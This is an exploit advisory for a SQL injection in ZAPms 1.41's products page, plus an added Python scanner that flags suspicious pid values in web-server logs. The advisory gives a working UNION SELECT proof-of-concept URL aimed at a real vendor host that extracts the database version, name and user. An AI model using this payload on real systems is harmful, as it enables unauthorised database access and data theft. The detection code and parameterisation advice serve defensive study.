ZAPms <= 1.41 SQL Injection Vulnerability

[o] ZAPms <= 1.41 SQL Injection Vulnerability

Software : ZAPms
Version  : 1.41
Vendor   : http://www.zapms.de/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/products?pid=[SQLi]


[o] PoC

 http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
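[o] Detection (added example, not part of the original advisory and not ZAPms code)

The injection point is the numeric pid parameter of the products page, so a defender can audit web-server access logs for any pid value that is not a plain integer. The log lines, the /shop path and the client addresses below are constructed placeholders; the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, placeholder IPs and path).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/products?pid=14&cid=0&action=details HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/products?pid=-14+union+select+1,2,version()--&cid=0&action=details HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/products?pid=14abc&cid=0 HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
192.0.2.11 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/products?cid=3 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")                      # what a product id should look like
SQL_HINT_RE = re.compile(r"\b(union|select)\b|--", re.I)

def classify_pid(value):
    """Return 'ok' for a plain integer, otherwise the reason the value is suspicious."""
    if INT_RE.fullmatch(value):
        return "ok"
    if SQL_HINT_RE.search(value):
        return "sqli-pattern"
    return "non-integer"

def scan(log_text):
    """Return (line number, client, verdict, decoded pid) for each bad pid on /products."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.rstrip("/").endswith("/products"):
            continue
        # parse_qs undoes '+' and percent-encoding, so the check sees the decoded value.
        for value in parse_qs(url.query, keep_blank_values=True).get("pid", []):
            verdict = classify_pid(value)
            if verdict != "ok":
                findings.append((lineno, client, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule belongs in the application itself: cast or validate pid before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.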
